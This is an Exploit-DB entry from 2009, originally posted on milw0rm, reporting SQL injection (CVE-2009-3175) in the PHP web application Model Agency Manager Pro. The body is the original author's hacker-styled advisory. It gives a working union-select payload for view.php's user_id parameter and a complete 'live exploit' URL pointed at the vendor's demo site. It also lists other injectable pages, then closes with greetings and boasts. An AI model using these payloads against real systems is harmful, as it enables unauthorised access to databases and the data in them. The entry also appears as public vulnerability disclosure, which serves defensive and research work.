Model Agency Manager Pro user_id SQL Injection Vulnerability

2009-09-09T00:00:00
ID EDB-ID:9603
Type exploitdb
Reporter R3d-D3V!L
Modified 2009-09-09T00:00:00

Description

Model Agency Manager Pro (user_id) SQL Injection Vulnerability. CVE-2009-3175. Webapps exploit for php platform

                                        
                                            [☢] ☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢{بسم الله الرحمن الرحيم}☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢
[☠]
[~] Tybe:(view.php user_id) Remote SQL Injection Vulnerability
[☠]
[~] Vendor: www.phpmodelagencyscript.com
[☠]
[☠] Software: Model Agency Manager PRO
[☠]
[☠] author: ((я3d D3v!L))
[☠]
[☠] Date: 7.9.2009
[☠]
[☠] Home: CL0S3D
[☠]
[☠] contact: X@hotmail.co.jp
[☠]☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠{DEV!L'5 of SYST3M}☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠

[☠] Exploit:

[☠] XxX/view.php?user_id= EV!L !NJECT
[☠] (EV!L !NJ3c7):1%20union%20select%20user(),2,3,4/*&view=photos

[☠] L!VE Exploit:
http://model-agency-manager-pro.phpmodelagencyscript.com/view.php?user_id=1%20union%20select%20user(),2,3,4/*&view=photos
[☠]MORE ER0RR:
photos.php?user_id=((я3d D3v!L))

motm.php?user_id=((DEV!L-Ro007))
forum_message.php?id=((STr0KE))

[☠]

N073:
REAL R3d-d3V!L !S h3R3 LAM3RZ ((☠X☠))

ARAB!AAN HAAACCKER !!

[~]-----------------------------{str0ke}-----------------------------------------------------
[~] Greetz tO: {str0ke} & DEV!L R007 & 8orn 2 K!LL & D.MODY & G0G0 & arabian hacker & EL z0hery
[~]
[~] spechial thanks : ((dolly)) & ((7am3m)) & ghost L0v3R & ۩۞۩๑ عماد ๑۩۞۩ & {0rashey}
[~]
[☠] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller
[~]
[~]!'M 4r48!4N 3xPLO!T3R
[~]
[~]--------------------------------------------------------------------------------

# milw0rm.com [2009-09-09]